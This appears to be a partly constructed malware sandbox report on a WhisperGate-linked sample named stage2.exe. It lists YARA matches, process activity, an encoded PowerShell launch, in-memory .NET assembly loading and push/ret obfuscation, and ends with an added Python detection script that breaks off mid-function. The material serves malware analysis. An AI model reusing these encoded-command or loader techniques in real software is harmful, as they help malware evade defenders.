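Run against the URL in this report, the attachment snowflake decodes to an upload on 2022-01-10 (UTC), several days before the sandbox run dated in the 403 response, which is the kind of pivot that turns one CDN URL into a timeline anchor. The snowflake layout and epoch are Discord's documented format; everything else here is constructed for the example.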

    System Summary:

    Source: stage2.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
    Source: stage2.exe, type: SAMPLE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: stage2.exe, type: SAMPLE | Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: stage2.exe, type: SAMPLE | Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE | Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE | Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPE | Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPE | Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: Process Memory Space: powershell.exe PID: 7160, type: MEMORYSTR | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
    Source: Process Memory Space: powershell.exe PID: 7140, type: MEMORYSTR | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
    Source: C:\Users\user\Desktop\stage2.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04A6CB10
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E75768
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E76728
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E78320
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E78310
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E79058
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E71B88
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E78320
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E79820
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07EA7E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07EA7E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07E71B78
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_07A3DFA8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_07A3F278
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_07A30040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_07A3EF20
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_07A30040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_07A67E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A67E0013_2_07A67E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080D8C2813_2_080D8C28
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080D8C1813_2_080D8C18
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080DA6B813_2_080DA6B8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080DA6B213_2_080DA6B2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3A16F13_2_07A3A16F
    Source: stage2.exe, 00000001.00000000.439903603.0000000000EA8000.00000002.00020000.sdmp; Binary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe
    Source: stage2.exe, 00000001.00000002.480852082.000000000161A000.00000004.00000020.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs stage2.exe
    Source: stage2.exe, 00000001.00000000.438479767.000000000161A000.00000004.00000020.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs stage2.exe
    Source: stage2.exe; Binary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe
    Source: stage2.exe; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: stage2.exe; Static PE information: invalid certificate
    Source: stage2.exe; Virustotal: Detection: 44%
    Source: stage2.exe; ReversingLabs: Detection: 48%
    Source: C:\Users\user\Desktop\stage2.exe; File read: C:\Users\user\Desktop\stage2.exe
    Source: stage2.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\stage2.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown; Process created: C:\Users\user\Desktop\stage2.exe "C:\Users\user\Desktop\stage2.exe"
    Source: C:\Users\user\Desktop\stage2.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\stage2.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\stage2.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
    Source: C:\Users\user\Desktop\stage2.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Users\user\Desktop\stage2.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Users\user\Desktop\stage2.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\Documents\20220117
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0qgkhds.0yb.ps1
    Source: classification engine; Classification label: mal72.troj.evad.winEXE@8/14@1/2
    Source: C:\Users\user\Desktop\stage2.exe; File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Users\user\Desktop\stage2.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WerFault.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WerFault.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WerFault.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7084
    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
    Source: C:\Users\user\Desktop\stage2.exe; File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\Desktop\stage2.exe; File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SysWOW64\WerFault.exe; File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SysWOW64\WerFault.exe; File read: C:\Windows\System32\drivers\etc\hosts
    Source: Window Recorder; Window detected: More than 3 window changes detected
    Source: C:\Users\user\Desktop\stage2.exe; File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: stage2.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: stage2.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: \??\C:\Windows\System.pdb& source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDBx source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Users\user\Desktop\stage2.PDBX source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: mscorlib.pdb source: stage2.exe, 00000001.00000002.481938339.0000000006684000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: (P}k0C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbW source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp
    Source: Binary string: .pdb! source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb6 source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: gpapi.pdb2 ]dd source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: cldapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp
    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: dhcpcsvc.pdbn source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wuser32.pdb>Srdn source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: combase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: rsaenh.pdb@ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: arkjrukCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000001A.00000002.477704320.00000000006E2000.00000004.00000001.sdmp
    Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: edputil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb< gd> source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp

    Data Obfuscation:

    .NET source code contains potential unpacker (Facade.cs calls System.Reflection.Assembly.Load(byte[]), which loads and runs an assembly from an in-memory byte array without writing it to disk, the usual shape of a .NET loader that unpacks an embedded or downloaded next stage)
    Source: stage2.exe, Facade.cs    .Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.0.stage2.exe.ea0000.0.unpack, Facade.cs    .Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.0.stage2.exe.ea0000.1.unpack, Facade.cs    .Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.2.stage2.exe.ea0000.0.unpack, Facade.cs    .Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.0.stage2.exe.ea0000.2.unpack, Facade.cs    .Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Uses code obfuscation techniques (call, push, ret)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Code function: 2_2_07E77471 push C033084Eh; ret 2_2_07E77482
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Code function: 2_2_07E773CF push C033084Eh; ret 2_2_07E773E2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Code function: 2_2_07E7F1A0 push eax; ret 2_2_07E7F1B3
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Code function: 2_2_07EA67E1 push es; ret 2_2_07EA67EC
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Code function: 13_2_07A327A0 push ebp; ret 13_2_07A327B4
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Code function: 13_2_07A32780 push esp; ret 13_2_07A32794
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Code function: 13_2_07A3273A push esp; ret 13_2_07A32794
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Code function: 13_2_07A667E1 push es; ret 13_2_07A667EC
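The push/ret hits above come from powershell.exe's process memory (processes 2 and 13 in this run), not from the stage2.exe image, and each listed ret address sits several bytes past its push, so the sandbox is pairing a push with a later ret inside the same function. The script below is an added example and is not part of the Joe Sandbox report or of the WhisperGate sample: it scans raw 32-bit x86 bytes for back-to-back push/ret pairs of the three forms listed (push imm32, push reg, push es) and then checks whether a push imm32 target could plausibly be a code address. The sample bytes, the 0x400000 image base and the 0x80000000 user-mode limit are constructed assumptions. A target above that limit, such as the C033084Eh the report shows, lies outside the default 2 GB user-mode range of a 32-bit process and is better read as data or a JIT-emitted constant than as an obfuscated jump, unless the process is large-address-aware.

```python
"""
Added example (not from the Joe Sandbox report): find "push ...; ret"
sequences in raw 32-bit x86 code and sanity-check the implied branch target.
Pure Python, no disassembler dependency.
"""
import struct

# x86 (32-bit) opcode bytes used below
PUSH_IMM32 = 0x68        # push imm32
PUSH_REG_BASE = 0x50     # push eax .. push edi is 0x50 + register index
PUSH_ES = 0x06           # push es
RET_NEAR = 0xC3          # ret

REG_NAMES = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def find_push_ret(code: bytes, base: int = 0):
    """Return (address, operand_text, static_target) for every back-to-back
    push/ret pair.  static_target is the immediate for push imm32 and None
    for a register or segment operand, whose value is only known at run time."""
    hits = []
    i, n = 0, len(code)
    while i < n:
        op = code[i]
        if op == PUSH_IMM32 and i + 5 < n and code[i + 5] == RET_NEAR:
            imm = struct.unpack_from("<I", code, i + 1)[0]
            hits.append((base + i, f"{imm:08X}h", imm))
            i += 6
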